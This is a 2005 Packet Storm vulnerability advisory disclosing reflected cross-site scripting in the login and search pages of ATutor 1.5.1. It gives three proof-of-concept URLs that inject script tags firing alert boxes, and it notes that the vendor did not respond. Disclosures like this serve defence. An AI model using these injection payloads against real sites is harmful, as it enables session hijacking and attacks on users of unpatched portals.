atutor151.txt

2005-08-19T00:00:00
ID PACKETSTORM:39484
Type packetstorm
Reporter matrix killer
Modified 2005-08-19T00:00:00

Description

                                        
                                            `ATutor 1.5.1 and prior multiple XSS Vulnerabilities  
  
SEVERITY:  
=========  
Medium  
  
SOFTWARE:  
=========  
ATutor 1.5.1  
http://www.atutor.ca/  
  
INFO:  
=====  
ATutor 1.5.1 is a web based education portal.  
  
DESCRIPTION:  
============  
The system is vulnerable to various XSS attacks:  
  
  
--==XSS==--  
  
Some examples -  
  
http://localhost/tour/login.php?course="><script>alert('Matrix_Killer  
r0X');</script>  
  
http://localhost/tour/search.php?search=1&search=1&words="><script>alert('There  
is no other place like  
127.0.0.1');</script>&include=all&find_in=all&display_as=pages  
  
http://localhost/tour/search.php?search=1&words="><script>alert('Found  
By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search  
  
VENDOR STATUS:  
==============  
Vendor was contacted but no response received till date.  
  
CREDITS:  
========  
This vulnerability was discovered and researched by   
matrix_killer of h4cky0u Security Forums.  
  
mail : matrix_k at abv.bg  
  
web : http://www.h4cky0u.org  
  
  
Co-Researcher:  
h4cky0u of h4cky0u Security Forums.  
  
mail : h4cky0u at gmail.com  
  
web : http://www.h4cky0u.org  
  
Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!  
  
ORIGINAL:  
=========  
http://h4cky0u.org/viewtopic.php?t=2094  
  
--   
http://www.h4cky0u.org  
(In)Security at its best...  
`